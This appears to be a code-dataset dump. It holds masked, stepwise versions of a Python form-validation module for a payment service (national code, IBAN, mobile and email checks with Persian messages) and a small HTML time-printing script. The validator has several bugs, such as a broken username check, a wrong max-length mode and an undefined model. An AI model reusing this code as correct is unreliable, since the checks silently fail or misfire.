self.addValidation({'field': field, 'user': user}, self.\n _check_with_authenticationValidator)\n return self\n\n\nclass FieldValidator:\n\n def __init__(self, validationData={}, *args, **kwargs):\n self.data = validationData\n self.validationPipeline = []\n self.statusCode = 200\n self.errors = {}\n self.invalidFields = []\n\n def flush(self):\n self = FieldValidator()\n\n def setError(self, field, error):\n if field not in self.invalidFields:\n fieldErrors = self.errors.get(field, [])\n if error[0] not in fieldErrors:\n self.errors[field] = fieldErrors + [error[0]]\n self.statusCode = error[1]\n self.invalidFields.append(field)\n\n def getErrors(self):\n return self.errors\n\n def validate(self):\n for validation in self.validationPipeline:\n try:\n validation['validator'](validation['data'])\n except:\n self.setError(validation['data']['field'], enum.Error.\n INVALID_FIELD_DATA.value)\n return self\n\n def addValidation(self, data, validatorFunction):\n if data['value'] == 'unAssigned' and data['field'] in self.data.keys():\n data['value'] = self.data[data['field']]\n elif data['value'] == 'unAssigned' and data['field'\n ] not in self.data.keys():\n data['value'] = None\n self.validationPipeline.append({'data': data, 'validator':\n validatorFunction})\n\n def _check_with_typeValidator(self, data):\n if not isinstance(data['value'], data['type']):\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n\n def _check_with_nationalLegalCodeValidator(self, data):\n nationalLegalCode = data['value']\n result = 0\n validationList = [29, 27, 23, 19, 17, 29, 27, 23, 19, 17]\n if len(nationalLegalCode) != 11:\n self.setError(data['field'], enum.Error.\n INVALID_NATIONAL_LEGAL_CODE.value)\n return\n for i in range(10):\n result += (int(nationalLegalCode[-2]) + 2 + int(\n nationalLegalCode[i])) * validationList[i]\n if result % 11 == 10:\n reminder = 0\n else:\n reminder = result % 11\n if reminder == int(nationalLegalCode[-1]):\n valid = True\n else:\n valid 
= False\n if valid is False:\n self.setError(data['field'], enum.Error.\n INVALID_NATIONAL_LEGAL_CODE.value)\n\n def _check_with_nationalCodeValidator(self, data):\n nCode = data['value']\n valid = True\n if len(nCode) != 10:\n valid = False\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n return\n sum = 0\n for i in range(9):\n sum += int(nCode[i]) * (10 - i)\n r = sum % 11\n if r < 2 and r == int(nCode[9]) or r >= 2 and r == 11 - int(nCode[9]):\n valid = valid and True\n if valid is False:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n\n def _check_with_officer1NationalCodeValidator(self, data):\n nCode = data['value']\n valid = True\n if len(nCode) != 10:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n return\n sum = 0\n for i in range(9):\n sum += int(nCode[i]) * (10 - i)\n r = sum % 11\n if r < 2 and r == int(nCode[9]) or r >= 2 and r == 11 - int(nCode[9]):\n valid = valid and True\n if valid is False:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n\n def _check_with_officer2NationalCodeValidator(self, data):\n nCode = data['value']\n valid = True\n if len(nCode) != 10:\n valid = False\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n return\n sum = 0\n for i in range(9):\n sum += int(nCode[i]) * (10 - i)\n r = sum % 11\n if r < 2 and r == int(nCode[9]) or r >= 2 and r == 11 - int(nCode[9]):\n valid = valid and True\n if valid is False:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n\n def _check_with_featuresValidator(self, data):\n for i in data['value']:\n if i not in ['پلتفرم پرداخت در محل', 'باشگاه مشتریان',\n 'درگاه پرداخت اینترنتی']:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.\n value)\n break\n\n def _check_with_userNameValidator(self, data):\n username = re.match('^[A-Za-z]+(?:[ _-][A-Za-z0-9]+)*$', data['value'])\n if 'admin' in data['value'] or 'zibal' in data['value'\n ] or username is None:\n 
self.setError(data['field'], enum.Error.INVALID_USERNAME.value)\n\n def _check_with_phoneNumberValidator(self, data):\n if data['value'] is None or len(data) < 1:\n self.setError(data['field'], enum.Error.\n PHONE_INCORRECT_TEMPLATE.value)\n\n def _check_with_mobileValidator(self, data):\n mobileNumber = data['value']\n if mobileNumber is None:\n self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)\n return\n match_object = re.match('(^09[0-9]{9}$)', mobileNumber)\n if match_object is None or mobileNumber is None:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n\n def _check_with_emailValidator(self, data):\n email = data['value']\n if email is None:\n self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)\n return\n match_object = re.match(\n '(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\\\.[a-zA-Z0-9-.]+$)', email)\n if match_object is None or email is None:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n\n def _check_with_noneValidator(self, data):\n if data['value'] is None or data['value'] == '':\n self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)\n\n def _check_with_fileValidator(self, data):\n file = data['value']\n field = data['field']\n if file is None:\n self.setError(field, enum.Error.EMPTY_INPUT_FIELD.value)\n return\n elif file.size > enum.Limits.FILE_SIZE_LIMIT.value:\n self.setError(field, enum.Error.FILE_SIZE_EXCEED.value)\n types = data['options'].get('types', None)\n valid = False\n if types is not None:\n for type in types:\n valid = valid or type in file.content_type\n if valid is False:\n self.setError(field, enum.Error.REQUEST_TYPE_ERROR.value)\n\n def _check_with_IBANValidator(self, data):\n iban = data['value']\n if len(iban) != 26 or not iban.startswith('IR'):\n self.setError(data['field'], enum.Error.IBAN_ERROR.value)\n return\n code = iban[4:] + iban[:4]\n code = code.replace('I', '18').replace('R', '27')\n if int(code) % 97 != 1:\n self.setError(data['field'], 
enum.Error.IBAN_ERROR.value)\n\n def _check_with_subMerchantBankAccountValidator(self, data):\n if not SubMerchant.objects.filter(idsql=data['value']['userId'], ID\n =data['value']['subId'], status=1).exists():\n self.setError(data['field'], enum.Error.\n IMPOSSIBLE_BANK_ACCOUNT_DESTINATION.value)\n\n def _check_with_minDataLengthValidator(self, data):\n if data['value'] is None or len(data['value']) < data['length']:\n self.setError(data['field'], (enum.Error.\n MESSAGE_INSUFFICIENT_LENGTH.value[0].format(data['length']),\n enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[1]))\n\n def _check_with_maxDataLengthValidator(self, data):\n if data['value'] is None or len(data['value']) > data['length']:\n self.setError(data['field'], (enum.Error.\n MESSAGE_INSUFFICIENT_LENGTH.value[0].format(data['length']),\n enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[1]))\n\n def _check_with_equalDataLengthValidator(self, data):\n if data['value'] is None or len(data['value']) != data['length']:\n self.setError(data['field'], (enum.Error.\n MESSAGE_INSUFFICIENT_LENGTH.value[0].format(data['length']),\n enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[1]))\n\n def _check_with_inputValidator(self, data):\n if data['value'] is None or len(data['value']) < 1:\n self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)\n\n def _check_with_IbanTransferable(self, data):\n if data['value'][4:7] == '062' and data['value'][-13:-10] == '080':\n self.setError(data['field'], enum.Error.NOT_IBAN_TRANSFERABLE.value\n )\n\n def _check_with_username(self, data):\n username = re.match('^[a-zA-Z0-9_.-]+$', data['value'])\n if username is None:\n self.setError(data['field'], enum.Error.INVALID_USERNAME.value)\n\n def checkType(self, field, type, value='unAssigned'):\n self.addValidation({'field': field, 'type': type, 'value': value},\n self._check_with_typeValidator)\n return self\n\n def checkNationalLegalCode(self, field, code='unAssigned'):\n self.addValidation({'field': field, 'value': code}, 
self.\n _check_with_nationalLegalCodeValidator)\n return self\n\n def checkOfficer1NationalCode(self, field, code='unAssigned'):\n self.addValidation({'field': field, 'value': code}, self.\n _check_with_officer1NationalCodeValidator)\n return self\n\n def checkOfficer2NationalCode(self, field, code='unAssigned'):\n self.addValidation({'field': field, 'value': code}, self.\n _check_with_officer2NationalCodeValidator)\n return self\n\n def checkNationalCode(self, field, code='unAssigned'):\n self.addValidation({'field': field, 'value': code}, self.\n _check_with_nationalCodeValidator)\n return self\n\n def checkFeatures(self, field, features='unAssigned'):\n self.addValidation({'field': field, 'value': features}, self.\n _check_with_featuresValidator)\n return self\n\n def checkUserName(self, field, username='unAssigned'):\n self.addValidation({'field': field, 'value': username}, self.\n _check_with_userNameValidator)\n return self\n\n def checkPhone(self, field, data='unAssigned'):\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_phoneNumberValidator)\n return self\n\n def checkMobile(self, field, data='unAssigned'):\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_mobileValidator)\n return self\n\n def checkEmail(self, field, data='unAssigned'):\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_emailValidator)\n return self\n\n def checkNotNone(self, field, data='unAssigned'):\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_noneValidator)\n return self\n\n def checkFile(self, field, data, **options):\n self.addValidation({'field': field, 'value': data, 'options':\n options}, self._check_with_fileValidator)\n return self\n\n def checkIBAN(self, field, data='unAssigned'):\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_IBANValidator)\n return self\n\n def checkBankAccountDestinationForSubmerchant(self, field, userId, subId):\n data = 
{'userId': userId, 'subId': subId}\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_subMerchantBankAccountValidator)\n return self\n\n def checkDataLength(self, field, length, mode='equal', data='unAssigned'):\n if mode == 'equal':\n validatorFunction = self._check_with_equalDataLengthValidator\n if mode == 'min':\n validatorFunction = self._check_with_minDataLengthValidator\n if mode == 'max':\n validatorFunction = self._check_with_minDataLengthValidator\n self.addValidation({'field': field, 'value': data, 'length': length\n }, validatorFunction)\n return self\n\n def checkInputData(self, field, data='unAssigned'):\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_inputValidator)\n return self\n\n def checkTelephone(self, field, data='unAssigned'):\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_phoneNumberValidator)\n return self\n\n def checkIsIbanTransferable(self, field, data='unAssigned'):\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_IbanTransferable)\n return self\n\n def checkUsername(self, field, data='unAssigned'):\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_username())\n\n\nclass DataValidator:\n\n def __init__(self, data={}):\n self.fieldValidator = FieldValidator(data)\n self.objectValidator = ObjectValidator()\n self.errors = {}\n self.statusCode = 200\n\n def getValidatorsErrors(self):\n self.objectValidator.validate()\n self.fieldValidator.validate()\n for key in self.fieldValidator.getErrors().keys():\n self.errors[key] = self.errors.get(key, []\n ) + self.fieldValidator.getErrors()[key]\n self.statusCode = self.fieldValidator.statusCode\n for key in self.objectValidator.getErrors().keys():\n self.errors[key] = self.errors.get(key, []\n ) + self.objectValidator.getErrors()[key]\n self.statusCode = (self.objectValidator.statusCode if self.\n objectValidator.statusCode != 200 else self.statusCode)\n return 
self.errors\n\n def generateMessage(self):\n messages = []\n errorKeys = self.errors.keys()\n if 'email' in errorKeys:\n messages.append(' آدرس ایمیل نامعتبر است')\n if 'name' in errorKeys:\n messages.append('نام را وارد کنید')\n if 'username' in errorKeys:\n messages.append('نام کاربری را وارد کنید')\n if 'password' in errorKeys:\n messages.append('رمز عبور را وارد کنید')\n if 'mobile' in errorKeys:\n messages.append('تلفن همراه خود را وارد کنید.')\n if 'phone' in errorKeys:\n messages.append(\n 'تلفن ثابت را به فرمت 02122407556 و 11 رقمی وارد کنید')\n if 'iban' in errorKeys or 'IBAN' in errorKeys:\n messages.append(\n 'شماره شبای وارد شده معتبر نیست. 26 کاراکتر و شروع با IR و بدون خط تیره (-) و فاصله'\n )\n if 'user' in errorKeys:\n messages.append('لطفا وارد شوید')\n return messages\n",
"step-5": "import API.enum as enum\nimport re\n\nclass ObjectValidator():\n\n def __init__(self, validationData={}, *args, **kwargs):\n self.data = validationData\n self.statusCode = 200\n self.validationPipeline = []\n self.errors = {}\n self.invalidFields = []\n\n def flush(self):\n self = ObjectValidator()\n return self\n\n def setError(self, field, error):\n if field not in self.invalidFields:\n fieldErrors = self.errors.get(field, [])\n if error[0] not in fieldErrors:\n self.errors[field] = fieldErrors + [error[0]]\n self.statusCode = error[1]\n self.invalidFields.append(field)\n def getErrors(self):\n return self.errors\n\n def validate(self):\n for validation in self.validationPipeline:\n try:\n validation['validator'](validation['data'])\n except:\n self.setError(validation['data']['field'], enum.Error.INVALID_FIELD_DATA.value)\n\n def addValidation(self, data, validatorFunction):\n self.validationPipeline.append({\n 'data': data,\n 'validator': validatorFunction\n })\n\n def _check_with_authenticationValidator(self, data):\n if not data['user'].is_authenticated:\n self.setError(data['field'], enum.Error.UNAUTHORIZED.value)\n\n def _check_with_nonDuplicateObjectValidator(self, data):\n model = data['model']\n if model.objects.filter(**data['filter']):\n self.setError(data['field'], enum.Error.DUPLICATE_FIELDS.value)\n\n def _check_with_ObjectExistenceValidator(self, data):\n model = data['model']\n if not model.objects.filter(**data['filter']):\n self.setError(data['field'], enum.Error.GENERIC_OBJECT_NOT_FOUND.value)\n\n def checkNonDuplicateObject(self, field, model, **filter):\n self.addValidation({'field': field, 'model': model, 'filter': filter},\n self._check_with_nonDuplicateObjectValidator)\n return self\n\n def checkObjectExistence(self, field, model, **filter):\n self.addValidation({'field': field, 'model': model, 'filter': filter},\n self._check_with_ObjectExistenceValidator)\n return self\n\n def checkUserAuthentication(self, field, user):\n 
self.addValidation({'field': field, 'user': user},\n self._check_with_authenticationValidator)\n return self\n\n\n#\\b(?!(\\d)\\1{3})[13-9]{4}[1346-9][013-9]{5}\\b\n# postal code validation\n\n\nclass FieldValidator():\n\n def __init__(self, validationData={}, *args, **kwargs):\n self.data = validationData\n self.validationPipeline = []\n self.statusCode = 200\n self.errors = {}\n self.invalidFields = []\n\n def flush(self):\n self = FieldValidator()\n\n def setError(self, field, error):\n if field not in self.invalidFields:\n fieldErrors = self.errors.get(field, [])\n if error[0] not in fieldErrors:\n self.errors[field] = fieldErrors + [error[0]]\n self.statusCode = error[1]\n self.invalidFields.append(field)\n\n def getErrors(self):\n return self.errors\n\n def validate(self):\n for validation in self.validationPipeline:\n try:\n validation['validator'](validation['data'])\n except:\n self.setError(validation['data']['field'], enum.Error.INVALID_FIELD_DATA.value)\n return self\n def addValidation(self, data, validatorFunction):\n if (data['value'] == 'unAssigned') and data['field'] in self.data.keys():\n data['value'] = self.data[data['field']]\n elif data['value'] == 'unAssigned' and data['field'] not in self.data.keys():\n data['value'] = None\n self.validationPipeline.append({\n 'data': data,\n 'validator': validatorFunction\n })\n\n def _check_with_typeValidator(self, data):\n if not isinstance(data['value'], data['type']):\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n\n def _check_with_nationalLegalCodeValidator(self, data):\n nationalLegalCode = data['value']\n result = 0\n validationList = [29, 27, 23, 19, 17, 29, 27, 23, 19, 17]\n if len(nationalLegalCode) != 11:\n self.setError(data['field'], enum.Error.INVALID_NATIONAL_LEGAL_CODE.value)\n return\n for i in range(10):\n result += (int(nationalLegalCode[-2]) + 2 + int(nationalLegalCode[i])) * validationList[i]\n if result % 11 == 10:\n reminder = 0\n else:\n reminder = result % 
11\n if reminder == int(nationalLegalCode[-1]):\n valid = True\n else:\n valid = False\n if valid is False:\n self.setError(data['field'], enum.Error.INVALID_NATIONAL_LEGAL_CODE.value)\n\n def _check_with_nationalCodeValidator(self, data):\n nCode = data['value']\n valid = True\n if len(nCode) != 10:\n valid = False\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n return\n sum = 0\n for i in range(9):\n sum += int(nCode[i]) * (10 - i)\n r = sum % 11\n if (r < 2 and r == int(nCode[9])) or r >= 2 and r == 11 - int(nCode[9]):\n valid = valid and True\n if valid is False:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n def _check_with_officer1NationalCodeValidator(self, data):\n nCode = data['value']\n valid = True\n if len(nCode) != 10:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n return\n sum = 0\n for i in range(9):\n sum += int(nCode[i]) * (10 - i)\n r = sum % 11\n if (r < 2 and r == int(nCode[9])) or r >= 2 and r == 11 - int(nCode[9]):\n valid = valid and True\n if valid is False:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n def _check_with_officer2NationalCodeValidator(self, data):\n nCode = data['value']\n valid = True\n if len(nCode) != 10:\n valid = False\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n return\n sum = 0\n for i in range(9):\n sum += int(nCode[i]) * (10 - i)\n r = sum % 11\n if (r < 2 and r == int(nCode[9])) or r >= 2 and r == 11 - int(nCode[9]):\n valid = valid and True\n if valid is False:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n\n def _check_with_featuresValidator(self, data):\n for i in data['value']:\n if i not in [\"پلتفرم پرداخت در محل\", \"باشگاه مشتریان\", \"درگاه پرداخت اینترنتی\"]:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n break\n\n def _check_with_userNameValidator(self, data):\n username = re.match(r\"^[A-Za-z]+(?:[ _-][A-Za-z0-9]+)*$\", data[\"value\"])\n if 
'admin' in data['value'] or 'zibal' in data['value'] or username is None:\n self.setError(data['field'], enum.Error.INVALID_USERNAME.value)\n\n def _check_with_phoneNumberValidator(self, data):\n if data['value'] is None or len(data) < 1:\n self.setError(data['field'], enum.Error.PHONE_INCORRECT_TEMPLATE.value)\n\n def _check_with_mobileValidator(self, data):\n mobileNumber = data['value']\n if mobileNumber is None:\n self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)\n return\n match_object = re.match(r\"(^09[0-9]{9}$)\", mobileNumber)\n if match_object is None or mobileNumber is None:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n\n def _check_with_emailValidator(self, data):\n email = data['value']\n if email is None:\n self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)\n return\n match_object = re.match(r\"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\.[a-zA-Z0-9-.]+$)\", email)\n if match_object is None or email is None:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n\n def _check_with_noneValidator(self, data):\n if data['value'] is None or data['value'] == \"\":\n self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)\n\n def _check_with_fileValidator(self, data):\n\n file = data['value']\n field = data['field']\n if file is None:\n self.setError(field, enum.Error.EMPTY_INPUT_FIELD.value)\n return\n elif file.size > enum.Limits.FILE_SIZE_LIMIT.value:\n self.setError(field, enum.Error.FILE_SIZE_EXCEED.value)\n types = data['options'].get('types', None)\n valid = False\n if types is not None:\n for type in types:\n valid = valid or type in file.content_type\n if valid is False:\n self.setError(field, enum.Error.REQUEST_TYPE_ERROR.value)\n\n def _check_with_IBANValidator(self, data):\n iban = data['value']\n if len(iban)!=26 or not iban.startswith(\"IR\"):\n self.setError(data['field'], enum.Error.IBAN_ERROR.value)\n return\n code = iban[4:]+iban[:4]\n code = 
code.replace('I','18').replace('R','27')\n if int(code)%97!=1:\n self.setError(data['field'], enum.Error.IBAN_ERROR.value)\n\n def _check_with_subMerchantBankAccountValidator(self, data):\n if not SubMerchant.objects.filter(idsql=data['value']['userId'], ID=data['value']['subId'], status=1).exists():\n self.setError(data['field'], enum.Error.IMPOSSIBLE_BANK_ACCOUNT_DESTINATION.value)\n\n def _check_with_minDataLengthValidator(self, data):\n if data['value'] is None or len(data['value']) < data['length']:\n self.setError(data['field'], (enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[0].format(data['length']),\n enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[1]))\n\n def _check_with_maxDataLengthValidator(self, data):\n if data['value'] is None or len(data['value']) > data['length']:\n self.setError(data['field'], (enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[0].format(data['length']),\n enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[1]))\n\n def _check_with_equalDataLengthValidator(self, data):\n if data['value'] is None or len(data['value']) != data['length']:\n self.setError(data['field'], (enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[0].format(data['length']),\n enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[1]))\n\n def _check_with_inputValidator(self, data):\n if data['value'] is None or len(data['value']) < 1:\n self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)\n\n def _check_with_IbanTransferable(self, data):\n if data['value'][4:7]=='062' and data['value'][-13:-10]=='080':\n self.setError(data['field'], enum.Error.NOT_IBAN_TRANSFERABLE.value)\n\n def _check_with_username(self, data):\n username = re.match(r\"^[a-zA-Z0-9_.-]+$\", data[\"value\"])\n if username is None:\n self.setError(data['field'], enum.Error.INVALID_USERNAME.value)\n\n #############################################################################\n\n def checkType(self, field, type, value=\"unAssigned\"):\n self.addValidation({'field': field, 'type': type, 'value': value}, 
self._check_with_typeValidator)\n return self\n\n def checkNationalLegalCode(self, field, code=\"unAssigned\"):\n self.addValidation({'field': field, 'value': code}, self._check_with_nationalLegalCodeValidator)\n return self\n\n def checkOfficer1NationalCode(self, field, code=\"unAssigned\"):\n self.addValidation({'field': field, 'value': code}, self._check_with_officer1NationalCodeValidator)\n return self\n\n def checkOfficer2NationalCode(self, field, code=\"unAssigned\"):\n self.addValidation({'field': field, 'value': code}, self._check_with_officer2NationalCodeValidator)\n return self\n\n def checkNationalCode(self, field, code=\"unAssigned\"):\n self.addValidation({'field': field, 'value': code}, self._check_with_nationalCodeValidator)\n return self\n\n def checkFeatures(self, field, features=\"unAssigned\"):\n self.addValidation({'field': field, 'value': features}, self._check_with_featuresValidator)\n return self\n\n def checkUserName(self, field, username=\"unAssigned\"):\n self.addValidation({'field': field, 'value': username}, self._check_with_userNameValidator)\n return self\n\n def checkPhone(self, field, data=\"unAssigned\"):\n self.addValidation({'field': field, 'value': data}, self._check_with_phoneNumberValidator)\n return self\n\n def checkMobile(self, field, data=\"unAssigned\"):\n self.addValidation({'field': field, 'value': data}, self._check_with_mobileValidator)\n return self\n\n def checkEmail(self, field, data=\"unAssigned\"):\n self.addValidation({'field': field, 'value': data}, self._check_with_emailValidator)\n return self\n\n def checkNotNone(self, field, data=\"unAssigned\"):\n self.addValidation({'field': field, 'value': data}, self._check_with_noneValidator)\n return self\n\n def checkFile(self, field, data, **options):\n self.addValidation({'field': field, 'value': data, 'options': options}, self._check_with_fileValidator)\n return self\n\n def checkIBAN(self, field, data=\"unAssigned\"):\n self.addValidation({'field': field, 'value': 
data}, self._check_with_IBANValidator)\n return self\n\n def checkBankAccountDestinationForSubmerchant(self, field, userId, subId):\n data = {\n 'userId': userId,\n 'subId': subId\n }\n self.addValidation({'field': field, 'value': data}, self._check_with_subMerchantBankAccountValidator)\n return self\n\n def checkDataLength(self, field, length,mode='equal', data=\"unAssigned\"):\n if mode == 'equal':\n validatorFunction = self._check_with_equalDataLengthValidator\n if mode == 'min':\n validatorFunction = self._check_with_minDataLengthValidator\n if mode == 'max':\n validatorFunction = self._check_with_minDataLengthValidator\n\n self.addValidation({'field': field, 'value': data, 'length': length}, validatorFunction)\n\n return self\n\n def checkInputData(self, field, data=\"unAssigned\"):\n self.addValidation({'field': field, 'value': data}, self._check_with_inputValidator)\n return self\n\n def checkTelephone(self, field, data=\"unAssigned\"): ##TODO\n self.addValidation({'field': field, 'value': data}, self._check_with_phoneNumberValidator)\n return self\n\n def checkIsIbanTransferable(self, field, data=\"unAssigned\"):\n self.addValidation({'field': field, 'value': data}, self._check_with_IbanTransferable)\n return self\n\n def checkUsername(self, field, data=\"unAssigned\"):\n self.addValidation({'field': field, 'value': data}, self._check_with_username())\n\n\nclass DataValidator:\n\n def __init__(self, data={}):\n self.fieldValidator = FieldValidator(data)\n self.objectValidator = ObjectValidator()\n self.errors = {}\n self.statusCode = 200\n\n def getValidatorsErrors(self):\n self.objectValidator.validate()\n self.fieldValidator.validate()\n for key in self.fieldValidator.getErrors().keys():\n self.errors[key] = self.errors.get(key, []) + self.fieldValidator.getErrors()[key]\n self.statusCode = self.fieldValidator.statusCode\n for key in self.objectValidator.getErrors().keys():\n self.errors[key] = self.errors.get(key, []) + 
self.objectValidator.getErrors()[key]\n self.statusCode = self.objectValidator.statusCode if self.objectValidator.statusCode != 200 else self.statusCode\n return self.errors\n\n def generateMessage(self):\n messages = []\n errorKeys = self.errors.keys()\n if 'email' in errorKeys:\n messages.append(' آدرس ایمیل نامعتبر است')\n\n if \"name\" in errorKeys :\n messages.append('نام را وارد کنید')\n\n if 'username' in errorKeys:\n messages.append('نام کاربری را وارد کنید')\n\n if 'password' in errorKeys:\n messages.append('رمز عبور را وارد کنید')\n\n if 'mobile' in errorKeys:\n messages.append('تلفن همراه خود را وارد کنید.')\n\n if 'phone' in errorKeys:\n messages.append('تلفن ثابت را به فرمت 02122407556 و 11 رقمی وارد کنید')\n if 'iban' in errorKeys or 'IBAN' in errorKeys:\n messages.append('شماره شبای وارد شده معتبر نیست. 26 کاراکتر و شروع با IR و بدون خط تیره (-) و فاصله')\n if 'user' in errorKeys:\n messages.append('لطفا وارد شوید')\n\n return messages",
"step-ids": [
40,
58,
62,
63,
65
]
}
|
[
40,
58,
62,
63,
65
] |
#!/usr/bin/python3
# -*- coding: utf-8 -*-
"""""""""""""""""""""""""""""""""""""""""""""""
" Filename: time.py
"
" Author: xss - callmexss@126.com
" Description: Show local time
" Create: 2018-07-02 20:20:17
"""""""""""""""""""""""""""""""""""""""""""""""
from datetime import datetime

# Build the HTML page as an f-string, then emit it in one write.
# str(datetime.now()) is interpolated exactly as the old .format() call did.
page = f"""\
<html>
<body>
<p>Generated {datetime.now()}</p>
</body>
</html>"""
print(page)
|
normal
|
{
"blob_id": "e8eac1e4433eee769d317de9ba81d5181168fdca",
"index": 6293,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(\n \"\"\" <html>\n <body>\n <p>Generated {0}</p>\n </body>\n </html>\"\"\"\n .format(datetime.now()))\n",
"step-3": "<mask token>\nfrom datetime import datetime\nprint(\n \"\"\" <html>\n <body>\n <p>Generated {0}</p>\n </body>\n </html>\"\"\"\n .format(datetime.now()))\n",
"step-4": "#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n\" Filename: time.py\n\"\n\" Author: xss - callmexss@126.com\n\" Description: Show local time\n\" Create: 2018-07-02 20:20:17\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n\nfrom datetime import datetime\n\n\nprint('''\\\n <html>\n <body>\n <p>Generated {0}</p>\n </body>\n </html>'''.format(datetime.now()))\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.